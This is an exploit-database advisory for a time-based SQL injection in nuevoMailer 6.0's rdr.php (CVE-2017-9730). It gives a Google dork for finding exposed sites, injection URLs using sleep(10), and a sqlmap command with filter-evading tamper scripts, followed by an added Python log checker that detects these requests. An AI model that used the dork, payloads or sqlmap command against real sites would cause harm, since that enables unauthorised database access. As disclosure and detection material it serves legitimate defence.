ID: 1337DAY-ID-27972
Type: zdt
Reporter: Oleg Boytsev
Modified: 2017-06-19T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and earlier
# Tested on: Linux
# CVE: CVE-2017-9730
Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier
allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4
NB: The "equaltolike" and "between" tamper scripts are used to defeat filtering. Data retrieval may take longer than usual.
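
A log check for the requests shown in the PoC, as an added example that is not part of the original advisory: it flags /inc/rdr.php requests whose "r" value is not a plain hex token or whose response was slow. The hex-token allowlist (inferred from the base values in the PoC URLs), the log line format, the time threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate "r" values are hex tokens, like the base values in the PoC URLs.
TOKEN_RE = re.compile(r"[0-9a-fA-F]{1,64}")
# Constructed log format: client "METHOD uri PROTO" status request_time_seconds
LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) (\d+(?:\.\d+)?)$')
SLOW_SECONDS = 3.0  # assumption: the redirect normally returns well under this

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 "GET /inc/rdr.php?r=69387c602c1056c556 HTTP/1.1" 302 0.012
203.0.113.9 "GET /inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+ HTTP/1.1" 200 10.021
203.0.113.9 "GET /inc/rdr.php?r=120c44c5%20AND%201%20LIKE%201 HTTP/1.1" 200 0.015
203.0.113.9 "GET /inc/rdr.php?r=120c44c5%20AND%205%20NOT%20BETWEEN%200%20AND%204 HTTP/1.1" 200 4.008
198.51.100.7 "GET /index.php?r=hello%20world HTTP/1.1" 200 0.020
198.51.100.8 "GET /inc/rdr.php?r=120c44c5 HTTP/1.1" 302 6.500
"""

def analyze(log_text):
    """Return (client, uri, reasons) for each suspicious rdr.php request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the constructed format; skip
        client, _method, uri, _status, seconds = m.groups()
        parts = urlsplit(uri)
        if not parts.path.endswith("/inc/rdr.php"):
            continue  # only the endpoint named in the advisory
        # parse_qs URL-decodes, so %20 and + both become spaces before matching
        values = parse_qs(parts.query, keep_blank_values=True).get("r", [])
        reasons = []
        if any(not TOKEN_RE.fullmatch(v) for v in values):
            reasons.append("non-token r value")
        if float(seconds) >= SLOW_SECONDS:
            reasons.append("slow response")
        if reasons:
            findings.append((client, uri, reasons))
    return findings

if __name__ == "__main__":
    for client, uri, reasons in analyze(SAMPLE_LOG):
        print(client, ", ".join(reasons), uri)
```

Because the check allowlists the token shape instead of matching SQL operators, it still flags requests rewritten by the "equaltolike" and "between" tamper scripts.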
Disclosure Timeline:
2017-06-09: Vendor has been notified
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-16: CVE number acquired
2017-06-16: Public disclosure
# 0day.today [2018-04-09] #